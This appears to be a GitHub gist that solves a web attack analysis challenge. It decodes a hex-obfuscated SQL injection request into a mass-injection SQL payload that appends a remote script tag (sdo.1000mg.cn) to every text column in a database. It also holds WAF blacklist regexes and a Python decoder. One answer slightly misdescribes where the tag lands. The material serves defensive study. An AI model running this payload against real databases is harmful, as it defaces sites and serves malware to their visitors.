@rdev5
Forked from rcbarnett-zz/Analysis Challenge #1
Last active September 22, 2015 21:42
Web Attack Analysis Challenge #1
Review this HTTP request -
GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x...%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Accept-Language: en-US
Accept-Encoding: deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: www.example.com
Connection: Close
Questions: Please provide as much detail as possible for steps used to answer these questions.
What type of attack is this?
Can you decode the attack payload?
What is the end goal of the attack?
How could a WAF detect and block this attack?
blacklist.txt
# case-insensitive regex list of patterns to block
# target: GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE @S VARCHAR(4000);SET @S=CAST(0x... AS VARCHAR(4000));EXEC(@S);-- HTTP/1.1
# matches: varchar( and varchar followed by any whitespace and (
varchar\s*\(
# matches: cast( and cast followed by any whitespace and (
cast\s*\(
# matches: exec( and exec followed by any whitespace and (
exec\s*\(
payload.sql
DECLARE @T VARCHAR(255), @C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id
AND a.xtype='u'
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=sdo.1000mg.cn/csrss/w.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
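The two analysis steps the challenge asks for (decode the CAST(0x... AS VARCHAR) payload, then decide what a WAF could match on) can be shown in a few lines of Python. This is an added example, not part of the gist: it URL-decodes the request target, hex-decodes any CAST(0x... AS VARCHAR(n)) literal to expose the inner SQL, and runs the three blacklist.txt patterns over both the decoded query string and the recovered inner SQL. The sample request line is constructed here from the challenge's request with a short stand-in for the real hex payload (the inner SQL used is an assumption, not the worm body above); the function and variable names are mine.

```python
import re
from urllib.parse import unquote

# The three case-insensitive patterns from blacklist.txt.
BLACKLIST = [r"varchar\s*\(", r"cast\s*\(", r"exec\s*\("]

# CAST(0x<hex> AS VARCHAR(n)) or NVARCHAR(n): the wrapper used to hide the inner SQL.
HEX_CAST_RE = re.compile(
    r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+n?varchar\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)


def decode_hex_literals(text):
    """Return the decoded string of every CAST(0x... AS [N]VARCHAR(n)) found in text."""
    found = []
    for m in HEX_CAST_RE.finditer(text):
        raw = bytes.fromhex(m.group(1))
        # NVARCHAR payloads are UTF-16-LE (every second byte is NUL); VARCHAR is single-byte.
        if len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
            found.append(raw.decode("utf-16-le"))
        else:
            found.append(raw.decode("latin-1"))
    return found


def inspect_request(request_line):
    """Inspect one HTTP request line the way a WAF rule stage would.

    Returns the URL-decoded target, any hex-decoded inner SQL, the blacklist
    patterns that matched in either layer, and the resulting block decision."""
    _method, target, _version = request_line.split(" ", 2)
    decoded = unquote(target)  # %20 -> space; the regexes rely on this step
    inner = decode_hex_literals(decoded)
    layers = [decoded] + inner
    hits = sorted(
        {p for p in BLACKLIST for layer in layers if re.search(p, layer, re.IGNORECASE)}
    )
    return {"decoded": decoded, "inner_sql": inner, "hits": hits, "block": bool(hits)}


# Constructed stand-in for the hex-encoded inner SQL (the real payload is payload.sql above).
INNER_SQL = "DECLARE @T VARCHAR(255); EXEC('SELECT 1')"
SAMPLE_REQUEST_LINE = (
    "GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE%20@S%20VARCHAR(4000);"
    f"SET%20@S=CAST(0x{INNER_SQL.encode('latin-1').hex().upper()}%20AS%20VARCHAR(4000));"
    "EXEC(@S);-- HTTP/1.1"
)

# A legitimate request whose parameter happens to contain "cast(": the patterns have no
# word boundary, so this is a false positive a rule author would want to know about.
FALSE_POSITIVE_LINE = "GET /search.asp?q=broadcast(tv) HTTP/1.1"

if __name__ == "__main__":
    for line in (SAMPLE_REQUEST_LINE, FALSE_POSITIVE_LINE):
        result = inspect_request(line)
        print(line[:60], "...")
        print("  inner SQL:", result["inner_sql"])
        print("  hits:", result["hits"], "block:", result["block"])
```

Note that the blacklist patterns match the attack even without decoding the hex, because the wrapper itself contains `VARCHAR(`, `CAST(` and `EXEC(`; decoding is still worth doing so the rule engine can log what the payload would have executed. The `broadcast(tv)` case shows why a production rule would anchor the keywords with `\b` and combine them, rather than blocking on any one substring.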
rdev5 commented Sep 22, 2015

Q. What type of attack is this?
A. This is a SQLi attack with a hex-encoded payload for obfuscation

Q. Can you decode the attack payload?
A. Yes: https://gist.github.com/rdev5/8b268b57305801e609fd#file-payload-sql

Q. What is the end goal of the attack?
A. Wholesale insert a <script ...></script> tag into any table column it has UPDATE privileges to in an attempt to include this script on a web page, prefixed with the column name (form of blind SQLi testing) for possibly further exploitation:

column_name<script src=sdo.1000mg.cn/csrss/w.js></script>

Q. How could a WAF detect and block this attack?
A. Blacklist one or more SQL command patterns: https://gist.github.com/rdev5/8b268b57305801e609fd#file-blacklist-txt
